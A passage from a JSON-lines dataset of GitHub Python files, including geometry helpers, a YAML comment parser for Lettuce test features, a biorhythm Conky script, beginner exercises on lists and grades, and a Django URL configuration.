integers(1, 10000), integers(0, 1000)),\n sampled_from(list(VerticalUnits)),\n )\n def test_create_full_stack_dataset(self, d, u):\n dataset = create3d_dataset(dims=d, vert_units=u)\n assert dataset.d3_domain == \"TWT\"\n assert dataset.measurement_system == u\n\n @given(\n integers(15, 60),\n floats(0, 15),\n floats(1, 15),\n sampled_from([\"TWT\", \"twt\", \"DEPTH\", \"depth\"]),\n )\n def test_create_angle_stack_dataset(self, o, f, s, d):\n dataset = create3d_dataset(\n (1000, 1000, 100, o), first_offset=f, offset_step=s, vert_domain=d\n )\n assert dataset.d3_domain == d.upper()\n assert len(dataset.dims) == 4\n","repo_name":"trhallam/segysak","sub_path":"tests/test_seismic_dataset.py","file_name":"test_seismic_dataset.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"32"}
+{"seq_id":"3526773695","text":"def findReciprocal(Value):\r\n try:\r\n print(\"Value:-\", Value)\r\n r =1/Value\r\n print(\"The reciprocl of\",Value,\"is\",r,\"\\n\")\r\n\r\n except:\r\n print(\"you cannt find reciprocal of \",Value,\"\\n\")\r\n\r\n\r\nfindReciprocal(\"hello\")\r\nfindReciprocal(2)","repo_name":"Abhishek6625/python","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"31942370719","text":"# 获取列表的一些基本信息\n\nlist1 = [9, 1, -4, 3, 7, 11, 3]\n\n#print('list1 =', len(list1))\n#print('list1.Max=', max(list1))\n#print('list1.Min=', min(list1))\n# print('list1.3={}'.format(list1.count(3)))\n\n# append 结尾插入\n# insert 中间插入\n# remove 删除\n# reverse 翻转\n# sort 排序 (不改为正序,reverse为倒序)\n\n\n# 列表的改变\n\nlist2 = ['a', 'c', 'd']\n\n# 给list2结尾添加一个新元素 'e'\nlist2.append('e')\n#print('list2=', list2)\n\n\n# 在list2的'a'和'c'之间插入一个 'b'\nlist2.insert(1, 'b')\n#print('list2=', list2)\n\n# 删除list2里的'b'\nlist2.remove('b')\n#print('list2=', list2)\n\n\n# 更改元素\nlist2[0] = '1'\n#print('list2=', list2)\n\n\n#a = '123'\n#a[0] = 'a'\n#a = 'abc'\n\n\n# 列表翻转\nlist3 = [1, 2, 3]\nlist3.reverse()\n#print('list3=', list3)\n\n\n# 列表排序\n\nlist4 = [9, 1, -4, 3, 7, 11, 3]\nlist4.sort(reverse=True)\n#print('list4=', list4)\n\n\nlist5 = [1, 'a', 3, [1, 2], 'c']\n\n# print(max(list5))\nprint(format(list5.count(1)))\nlist5.append('b')\nlist5.insert(1, 2)\nlist5.remove('b')\nlist5[2] = 3\nlist5[3] = 4\n\nlist5.reverse() # 先排字符串>列表>整数\n# list5.sort(reverse=True) 无法倒序\nprint(list5)\n","repo_name":"op5280546/Python-Test","sub_path":"列表和元組/list_methods.py","file_name":"list_methods.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"296008374","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nShow biorhythm warnings like the KOSMOS-1 calculator with Conky\nP: physical\nE: emotional\nI: intellectual\n\n2013-08-23\n\nRed: critical days\nOrange: mini-critical days\nSee http://decodesystems.com/kosmos-1.html\n\nDominant cycle is shown in parentheses.\n\nargument 1: number of days in advance (today = 0)\n\n\"\"\"\n\ndd,mm,yy=1,1,1990\n\nfrom datetime import date\nfrom sys import argv\nfrom math import sin,pi\n\nt0 = date(yy,mm,dd).toordinal()\nt1 = date.today().toordinal()\n\nwa=(\n((1,12,13),(7,18)),\n((1,15),(8,22)),\n((1,17,18),(9,26))\n)\n\ns = {'_': '${color green}●${color}', 'y': '${color yellow}●${color}', 'r': '${color red}●${color}'}\n\nout = \"\"\n\nt = t1 + int(argv[1])\n\nw = ['_','_','_']\no = ['*','*','*']\nperc = [0,0,0]\nfor c in range(3):\n p = 23+5*c\n perc[c] = 100.*sin(2*pi*(t-t0)/p)\n v = ((t-t0) % p)+1\n if (v-1) <= p/2:\n o[c] = 'H'\n if (v-1) >= p/2:\n o[c] = 'T'\n if v in wa[c][0]:\n w[c] = 'r'\n o[c] = 'K'\n if v in wa[c][1]:\n w[c] = 'y'\nfor x in w:\n out += s[x] + ' '\nfor x in o:\n out += x + ' '\n\nif perc[0]>perc[1] and perc[0]>perc[2]:\n out += '(P)'\nelif perc[1]>perc[0] and perc[1]>perc[2]:\n out += '(E)'\nelse:\n out += '(I)'\n\nprint(out)\n","repo_name":"trivedisorabh/PyoRhythm","sub_path":"conky/bioconky.py","file_name":"bioconky.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"70883799132","text":"import re\nimport yaml\n\nMF_ID_KEYWORD = \"MF\"\nMF_COMMENT_KEYWORD = \"Comment\"\nMF_SIGNATURE = \"#MF:\"\nMF_PATTERN = re.compile(\"([ \\t]*#MF:.*(\\r\\n?|\\n)([ \\t]*#([^M][^F][^:])?.*(\\r\\n?|\\n))*)\")\n\ndef occurence_ranges(occs, text):\n pairs = []\n for occ in occs:\n pos = text.find(occ, pairs[-1][-1] if len(pairs) > 0 else None)\n if pos >= 0:\n pairs.append((pos, pos+len(occ)))\n return pairs\n\ndef line_ranges(text):\n return occurence_ranges(text.splitlines(True), text)\n\ndef pattern_occurences(regexp, text):\n def filter_tuples(match):\n if isinstance(match, tuple):\n return match[0]\n return match\n\n matches = map(filter_tuples,regexp.findall(text))\n return occurence_ranges(matches, text)\n\nclass InplaceMustfailParser(object):\n \"\"\"\n MF is the commented YAML text, having the following convention:\n MF - field for MF id\n Comment - field for comments\n Other fields may be introduced in later versions\n\n Example 1:\n #MF: BUG-45\n #Comment: |\n # first line of comment\n # last line\n\n Example 2:\n #MF: http://mybugtracker/ID33\n #Comment: bla bla bla\n \"\"\"\n\n def __init__(self, feature):\n self.feature_text = feature.original_string\n self.mf_occs = pattern_occurences(MF_PATTERN, feature.original_string)\n self.line_occs = line_ranges(feature.original_string)\n self.linenum2mf = self.__map_lines_mfs()\n self.mf_dict = self.__as_dict(feature)\n\n def __map_lines_mfs(self):\n def mf_on_line(mf, line):\n line_start, line_end = line\n mf_start, mf_end = mf\n mf_end = mf_end if mf_start == mf_end else mf_end-1\n return line_start <= mf_end < line_end\n\n nline2mf = {}\n try:\n nlines = enumerate(self.line_occs)\n n, line = next(nlines)\n for mf in self.mf_occs:\n while True:\n if mf_on_line(mf, line):\n nline2mf[n+1] = mf\n break\n n, line = next(nlines)\n except StopIteration:\n pass\n return nline2mf\n\n def __len__(self):\n return len(self.mf_dict)\n\n def __item_under_mf(self,linenum):\n return (linenum-1) in self.linenum2mf\n\n def __mf_text_for_line(self, linenum):\n start, end = self.linenum2mf[linenum-1]\n return self.feature_text[start:end]\n\n def __create_mf_item(self, pattern, mf_text, linenum):\n text = mf_text.replace(\"#\", \"\")\n d = yaml.load(text)\n result = {'pattern' : pattern}\n if MF_ID_KEYWORD in d:\n result[\"id\"] = d[MF_ID_KEYWORD]\n if MF_COMMENT_KEYWORD in d:\n result['comment'] = d[MF_COMMENT_KEYWORD]\n result['line'] = linenum\n return result\n\n def __check_add_mf(self, linenum, name, lst_to_add):\n if self.__item_under_mf(linenum):\n lst_to_add.append(\n self.__create_mf_item('.*?{name}.*?'.format(name=name),\n self.__mf_text_for_line(linenum),\n linenum))\n\n def as_dict(self):\n return self.mf_dict\n\n def __as_dict(self, feature):\n mf = {}\n mf_scenarios = []\n mf_steps = []\n mf_features = []\n\n self.__check_add_mf(feature.described_at.line, feature.name, mf_features)\n\n for scenario in feature.scenarios:\n self.__check_add_mf(scenario.described_at.line, scenario.name, mf_scenarios)\n for step in scenario.steps:\n self.__check_add_mf(step.described_at.line, step.sentence, mf_steps)\n\n if len(mf_features) > 0:\n mf['features'] = mf_features\n if len(mf_scenarios) > 0:\n mf['scenarios'] = mf_scenarios\n if len(mf_steps) > 0:\n mf['steps'] = mf_steps\n\n return {'MustFail': mf} if len(mf) > 0 else {}\n\n","repo_name":"griddynamics/bunch","sub_path":"lettuce_bunch/mustfail.py","file_name":"mustfail.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"38919071332","text":"# https://programmers.co.kr/learn/courses/30/lessons/12951\n# JadenCase 문자열 만들기\n\ndef solution(s):\n s = list(s)\n start = 0\n \n for i in range(len(s)):\n if start == 0 and s[i].isalpha():\n s[i] = s[i].upper()\n elif s[i].isalpha():\n s[i] = s[i].lower()\n if s[i] == \" \":\n start = 0\n else:\n start = start + 1\n\n return \"\".join(s)","repo_name":"miche715/Programmers-Algorithm","sub_path":"python/p_12951.py","file_name":"p_12951.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"32756154905","text":"from functools import partial\n\ntry:\n from shapely.geometry import mapping, shape\n from shapely.geos import TopologicalError\nexcept ImportError:\n pass\ntry:\n import numpy as np\nexcept ImportError:\n pass\ntry:\n import visvalingamwyatt as vw\nexcept ImportError:\n pass\n\n\ndef clipper(bbox):\n \"\"\"\n Create a clipping function for a given bounding box.\n\n Args:\n bbox (tuple): bounding box\n\n Returns:\n function that will given geometries to input bounding box\n \"\"\"\n minx, miny, maxx, maxy = bbox\n bounds = {\n \"type\": \"Polygon\",\n \"coordinates\": [[(minx, miny), (minx, maxy), (maxx, maxy), (maxx, miny), (minx, miny)]],\n }\n try:\n bbox_shape = shape(bounds)\n\n def func(geometry):\n # This is technically only needed in Py3, but whatever.\n try:\n clipped = bbox_shape.intersection(shape(geometry))\n except (ValueError, TopologicalError):\n return geometry\n\n return mapping(clipped)\n\n except NameError:\n\n def func(geometry):\n return geometry\n\n return func\n\n\ndef clip(geometry, bounds):\n \"\"\"\n Clip a geometry to a bounding box. Equivalent to calling clipper(bounds)(geometry).\n\n Args:\n geometry (dict): geometry object\n bounds (tuple): bounding box\n\n Returns:\n (dict) geometry\n \"\"\"\n try:\n return clipper(bounds)(geometry)\n\n except NameError:\n return geometry\n\n\ndef simplifier(ratio):\n \"\"\"\n Create a simplification function, if visvalingamwyatt is available.\n Otherwise, return a noop function.\n\n Args:\n ratio (int): Between 1 and 99\n\n Returns:\n simplification function\n \"\"\"\n try:\n # put this first to get NameError out of the way\n simplify = vw.simplify_geometry\n\n if ratio is None or ratio >= 100 or ratio < 1:\n raise SvgisError(\"Invalid ratio\")\n\n return partial(simplify, ratio=ratio / 100.0)\n\n except (TypeError, ValueError, NameError):\n return None\n\n\ndef scale(coordinates, scalar=1):\n '''Scale a list of coordinates by a scalar. Only use with projected coordinates'''\n try:\n try:\n arr = np.array(coordinates, dtype=float)\n\n except TypeError:\n arr = np.array(list(coordinates), dtype=float)\n\n return arr * scalar\n\n except NameError:\n if isinstance(coordinates, tuple):\n return [coordinates[0] * scalar, coordinates[1] * scalar]\n\n return [(c[0] * scalar, c[1] * scalar) for c in coordinates]\n\n\ndef scale_rings(rings, factor=1):\n \"\"\"Apply scale() to a list of rings.\"\"\"\n return [scale(ring, factor) for ring in rings]\n\n\ndef scale_geom(geom, factor=1):\n \"\"\"\n Scale a geometry by a given factor\n\n Args:\n geom (dict): geojson-like dict\n factor (numeric): scale factor, default: 1\n \"\"\"\n if geom['type'] == 'MultiPolygon':\n geom['coordinates'] = [scale_rings(rings, factor) for rings in geom['coordinates']]\n\n elif geom['type'] in ('Polygon', 'MultiLineString'):\n geom['coordinates'] = scale_rings(geom['coordinates'], factor)\n\n elif geom['type'] in ('MultiPoint', 'LineString'):\n geom['coordinates'] = scale(geom['coordinates'], factor)\n\n elif geom['type'] == 'Point':\n geom['coordinates'] = scale(geom['coordinates'], factor)\n\n elif geom['type'] == 'GeometryCollection':\n geom['geometries'] = [scale_geom(i) for i in geom['geometries']]\n\n else:\n raise NotImplementedError(f\"Unsupported geometry type: {geom['type']}\")\n\n return geom\n","repo_name":"fitnr/svgis","sub_path":"src/svgis/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"32"}
+{"seq_id":"1961992544","text":"############################################################################################################################\n#PROGRAMA DE FOTOGRAFIAS\nimport re\ndef Fotografias():\n total = 0\n\n print(\"\\n######################################\\n#Bienvenido Al Sistema De Fotografias#\\n######################################\\n\")\n \n Cantidad_Fotos = int(input(\"\\nIngrese La Cantidad De Fotografias\\n\"))\n\n Tipo_Fotografia = input(\"\\nTipo de fotografía: a)Blanco y negro b)Color\\n\")\n Tipo_Fotografia = Tipo_Fotografia.upper()\n\n Tamaño_Foto = int(input(\"\\nTamaño de las fotografías: 1.-4 x 6 2.-6x8 3.-8x10 4.-10x12\\n\"))\n\n #EVALUAMOS SI EL TIPO DE LA FOTOGRAFIA ES A BLANCO Y NEGRO\n if Tipo_Fotografia == \"A\":\n \n #EVALUAMOS EL TAMAÑO DE LA FOTOGRAFIA SI SELECCIONA UNA OPCION NO DISPONIBLE MOSTRARA UN MENSAJE AL USUARIO\n if Tamaño_Foto == 1: \n total = (1.5 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 2:\n total = (3.0 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 3:\n total = (5.5 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 4: \n total = (10.0 * Cantidad_Fotos)\n \n else:\n print(\"Opcion Seleccionada No Disponible\")\n\n #EVALUAMOS SI EL TIPO DE LA FOTOGRAFIA ES A COLOR\n elif Tipo_Fotografia == \"B\":\n\n #EVALUAMOS EL TAMAÑO DE LA FOTOGRAFIA SI SELECCIONA UNA OPCION NO DISPONIBLE MOSTRARA UN MENSAJE AL USUARIO\n if Tamaño_Foto == 1: \n total = (5.5 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 2:\n total = (12.0 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 3:\n total = (15.0 * Cantidad_Fotos)\n \n elif Tamaño_Foto == 4: \n total = (18.5 * Cantidad_Fotos)\n \n else:\n print(\"Opcion Seleccionada No Disponible\")\n\n #SI NO ES NI A BLANCO Y NEGRO NI A COLOR MOSTRARA MENSAJE DE OPCION NO DISPONIBLE\n else:\n print(\"Opcion Seleccionada No Disponible\") \n\n servicio = input(\"\\n¿El Servicio Será Impreso o por correo electrónico? [I / C]?:\\n\")\n servicio = servicio.upper()\n\n\n if servicio == \"I\":\n total = total + (total * 0.15)\n print(f\"TOTAL a pagar: $ {total} pesos\\n\") \n elif servicio == \"C\":\n \n #EVALUAMOS MEDIANTE EXPRESIONES REGULARES HACIENDO USO DE LA LIBRERIA \"re\" si la estructura corresponde a la de un correo electronico si no muestra un mensaje de correo no valido y solicita de nuevo el correo\n while True:\n print(\"\\nFavor de indicar el correo de envío:\\n\") \n correo = input()\n if re.match('^[(a-z0-9\\_\\-\\.)]+@[(a-z0-9\\_\\-\\.)]+\\.[(a-z)]{2,15}$',correo.lower()):\n print(f\"\\nLa Direccion De Correo A La Que Se enviara es: {correo}\")\n print(f\"\\nTOTAL a pagar: $ {total} pesos\\n\")\n else:\n print (\"*** DIRECCIóN DE CORREO NO VÁLIDA ***\")\n if re.match('^[(a-z0-9\\_\\-\\.)]+@[(a-z0-9\\_\\-\\.)]+\\.[(a-z)]{2,15}$',correo.lower()):break \n#######################################################################################################################################\n#PROGRAMA DE CALIFICACIONES\ndef Calificaciones(estudiantes):\n\n #VARIABLE PARA GUARDAR LAS CALIFICACIONES DE LOS ALUMNOS\n calificacion = 0\n\n #VARIABLES DE ACUMULACION PARA GUARDAR LA CANTIDAD DE ALUMNOS CON ESTA CALIFICACION\n calificaciones7 = 0\n calificaciones8 = 0\n calificaciones9 = 0\n calificaciones10 = 0\n\n #VARIABLES DE ACUMULACION PARA LOS ALUMNOS QUE APROBARON Y LOS QUE NO\n estudiantes_aprobados = 0\n estudiantes_reprobados = 0\n\n #VARIABLES PARA GRAFICAR SI EL USUARIO SELECCIONA LA OPCION \n A = \"\"\n R = \"\"\n \n\n#MEDIANTE ESTE CICLO FOR LLENAMOS EL ARREGLO CON LAS CALIFICACIONES DE LOS ALUMNOS Y ACUMULAMOS LOS ESTUDIANTES APROBADOS Y REPROBADOS\n for i in range(estudiantes):\n calificacion = int(input(f\"\\nIngrese la Calificacion N° {i + 1}\\n\" )) \n if calificacion >= 7:\n estudiantes_aprobados = estudiantes_aprobados + 1\n if calificacion == 7:\n calificaciones7 = calificaciones7 + 1\n if calificacion == 8:\n calificaciones8 = calificaciones8 + 1\n if calificacion == 9:\n calificaciones9 = calificaciones9 + 1 \n if calificacion == 10:\n calificaciones10 = calificaciones10 + 1 \n else:\n estudiantes_reprobados = estudiantes_reprobados + 1\n\n print(f\"\\nEstudiantes con una calificación de 7: {calificaciones7}\")\n print(f\"Estudiantes con una calificación de 8: {calificaciones8}\")\n print(f\"Estudiantes con una calificación de 9: {calificaciones9}\")\n print(f\"Estudiantes con una calificación de 10: {calificaciones10}\")\n\n print(f\"\\nEstudiantes Que Reprobaron: {estudiantes_reprobados}\\nEstudiantes Que Aprobaron: {estudiantes_aprobados}\")\n \n graficar = input(\"\\n¿Desea Graficar Los Resultados S/N?:\\n\")\n graficar = graficar.upper()\n\n if graficar == \"S\":\n for i in range (estudiantes_aprobados):\n A = A + \"**\"\n \n for i in range (estudiantes_reprobados):\n R = R + \"**\"\n\n print(f\"\\n--------GRÁFICA---------\\nA {A}\\nR {R}\\n\")\n import matplotlib.pyplot as plt\n import numpy as np\n\n #HACEMOS USO DE NUMPY MEDIANTE INTERFAZ GRAFICA SE MUESTRA UN GRAFICO CON LOS ALUMNOS QUE SACARON CALIFICACION DE 7,8,9 Y 10\n #ARREGLO con las calificaciones como string\n calificacionestxt = ['Calificacion 7', 'Calificacion 8', 'Calificacion 9', 'Calificacion 10']\n #ARREGLO con la calificacion como entero\n calificacionesval = [calificaciones7 , calificaciones8 , calificaciones9 , calificaciones10 ]\n\n fig, ax = plt.subplots()\n #Colocamos una etiqueta en el eje Y\n ax.set_ylabel('CANTIDAD DE PERSONAS')\n #Colocamos una etiqueta en el eje X\n ax.set_title('Promedio De Calificaciones APROBATORIAS')\n #Creamos la grafica de barras utilizando 'calificaciones' como eje X y 'CANTIDAD DE PERSONAS CALIFICACIONES' como eje y.\n plt.bar(calificacionestxt, calificacionesval)\n \n #mostramos la grafica con el metodo show()\n gr = plt.show()\n return gr\n else:\n print(\"Saliendo...\\n\") \n##############################################################################################################################\n#PROGRAMA PRINCIPAL\n#CREAMOS UN CICLO PARA SALIR HASTA QUE EL USUARIO SELECCIONE LA OPCION 3 O UNA OPCION DIFERENTE A LA 1 Y 2\nwhile True:\n print(\"********************************\\n***** Bienvenido Al Menu *****\\n********************************\\n1. Fotografías 2.Calificaciones 3. Salir\")\n opcion = int(input(\"Seleccione Una Opcion\\n\"))\n \n #HACEMOS EL LLAMADO A LA FUNCION DE FOTOGRAFIAS Y EJECUTA SU PROCESO\n if opcion == 1:\n Fotografias()\n #HACEMOS EL LLAMADO A LA FUNCION DE CALIFICACIONES Y EJECUTA SU PROCESO ESTA FUNCION RECIBE PARAMETROS Y RETORNA UNA VARIABLE DEPENDIENDO DE LA SELECCION DEL USUARIO\n elif opcion == 2:\n print(\"\\n#########################################\\n#Bienvenido Al Sistema De Calificaciones#\\n#########################################\\n\")\n \n estudiantes = int(input(\"Cantidad de estudiantes en el grupo:\\n\"))\n Calificaciones(estudiantes)\n #SI EL USUARIO SELECCIONA LA OPCION 3 O INGRESA UNA OPCION DIFERENTE A 1 O 2 EL PROGRAMA MOSTRARA UN MENSAJE DE SALIENDO Y FINALIZARA \n else:\n print(\"Saliendo...\")\n break ","repo_name":"MeXinuX/Calificaciones-Fotografias","sub_path":"photo&¬es.py","file_name":"photo&¬es.py","file_ext":"py","file_size_in_byte":7732,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"7718342276","text":"\"\"\"Posts URL Configuration\"\"\"\n\nfrom django.urls import path\nfrom posts import views\n\nurlpatterns = [\n\n path('home/', views.HomePostsList.as_view(), name='home'),\n #path('new-post/', views.new_post, name='new-post'),\n path('new-post/', views.CreatePostView.as_view(), name='new-post'),\n path('like/', views.new_like, name='like'),\n path('/new-comment/', views.new_comment, name='new-comment'),\n #path('/comments/', views.list_comments, name='show-comments'),\n path('/comments/', views.PostDetail.as_view(), name='show-comments'),\n #path('//comments/', views.list_comments, name='show-comments-reply'),\n path('//comments/', views.PostDetail.as_view(), name='show-comments-reply'),\n path('/likes/', views.list_likes, name='show-likes'),\n path('saved_posts/', views.list_saved_posts, name='show-saved'),\n path('save_post/', views.save_post, name='save'),\n path('/delete/', views.delete_post, name='delete'),\n path('/like/', views.like_comment, name='comment-like'),\n path('/reply/', views.new_reply, name='reply'),\n path('